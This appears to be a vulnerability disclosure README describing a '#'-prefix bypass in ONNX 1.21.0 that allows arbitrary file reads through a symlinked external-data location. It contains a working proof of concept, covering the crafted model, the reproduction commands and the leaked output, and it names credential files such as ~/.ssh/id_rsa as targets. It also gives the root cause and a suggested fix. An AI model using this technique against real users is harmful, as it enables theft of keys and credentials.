PoC: ONNX 1.21.0 #-prefix bypass β†’ Arbitrary File Read

This repository contains a proof-of-concept for an unfixed path-traversal vulnerability in ONNX 1.21.0 (latest official release at time of submission).

Summary

onnx.checker and onnx.load_external_data_for_model skip all security checks (verify_path_containment, is_regular_file, hard_link_count > 1) whenever the resolved external-data path starts with '#'. That prefix is meant as a marker for in-memory tensors, but the check is performed on the full resolved path (base_dir / location) instead of on the original location string. When base_dir is empty β€” which is exactly what onnx.load("model.onnx") produces when called with a bare filename β€” the resolved path equals the attacker-controlled location. A location starting with # therefore bypasses every check.

The result is an arbitrary file read via a symlink whose name starts with #, on the current latest release.

Versions

  • Tested vulnerable: onnx==1.21.0 (latest at submission)
  • Bypasses the fix for CVE-2026-27489 (the fix introduced the data_path_str[0] != '#' check that this PoC exploits).

Files

File Description
poc_bundle.tar.gz Self-contained tarball with model.onnx, a symlink #hidden_link β†’ secret_dir, and secret_dir/passwd with a distinctive marker. The tarball is used because git/HF do not always preserve symlinks.
model.onnx Same model as inside the tarball (for inspection). External-data location = "#hidden_link/passwd".
reproduce.py Automated reproducer. Extracts the tarball into a temp directory and demonstrates the leak.
setup.sh / setup.ps1 Manual symlink creator if you prefer not to use the tarball.

Reproduction (one-liner)

pip install onnx==1.21.0
python reproduce.py

Expected output:

[+] extracted poc_bundle.tar.gz into /tmp/onnx_poc_xxxxxx
[!!!] LEAK: onnx.load() returned 16 bytes from the symlink target:
       b'TOPSECRET_DATA_L'

The 16 bytes are read from secret_dir/passwd via the symlink #hidden_link that the malicious model.onnx references as its external-data location. In a real attack the symlink would target /etc/passwd, ~/.ssh/id_rsa, an AWS credentials file, etc.

Manual reproduction

mkdir poc && cd poc
tar xzf <repo-path>/poc_bundle.tar.gz
python -c "
import onnx
m = onnx.load('model.onnx')
print(m.graph.initializer[0].raw_data)
"
# β†’ b'TOPSECRET_DATA_L'

Realistic attack scenario

  1. Attacker bundles a model release as a zip/tarball containing model.onnx (with external_data.location = "#hidden_link/<target>") and a symlink #hidden_link β†’ /etc (or ~/.ssh, or /proc/self/environ, etc.).
  2. Victim downloads the release, extracts it (preserving the symlink), and runs onnx.load("model.onnx") from the extracted directory β€” a typical first line in any ONNX consumer script.
  3. ONNX reads the symlink target's contents into model.graph.initializer[0].raw_data without any of the safety checks the v1.21.0 fix was supposed to provide.

Root cause

onnx/checker.cc:1213-1232 (paths abbreviated):

if (data_path_str[0] != '#') {                            // bypass #1
    verify_path_containment(data_path, base_dir, ...);
}
if (data_path_str[0] != '#' && !std::filesystem::is_regular_file(data_path)) {   // bypass #2
    fail_check(...);
}
if (data_path_str[0] != '#' && std::filesystem::hard_link_count(data_path) > 1) { // bypass #3
    fail_check(...);
}

The Python helper does the right thing (onnx/model_container.py:124):

def is_in_memory_external_initializer(self, name: str) -> bool:
    return name.startswith("#")        # checks the *location*, not the resolved path

The C++ checker should do the same β€” check the original location string from the protobuf, not data_path_str after base_dir / location joining.

Suggested fix

const bool is_in_memory_marker = !location.empty() && location[0] == '#';
if (!is_in_memory_marker) {
    verify_path_containment(data_path, base_dir, tensor_name);
}
if (!is_in_memory_marker && !std::filesystem::is_regular_file(data_path)) {
    fail_check(...);
}
if (!is_in_memory_marker && std::filesystem::hard_link_count(data_path) > 1) {
    fail_check(...);
}

Disclosure

Reported via huntr.com (Protect AI) before public disclosure on GitHub or oss-security.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support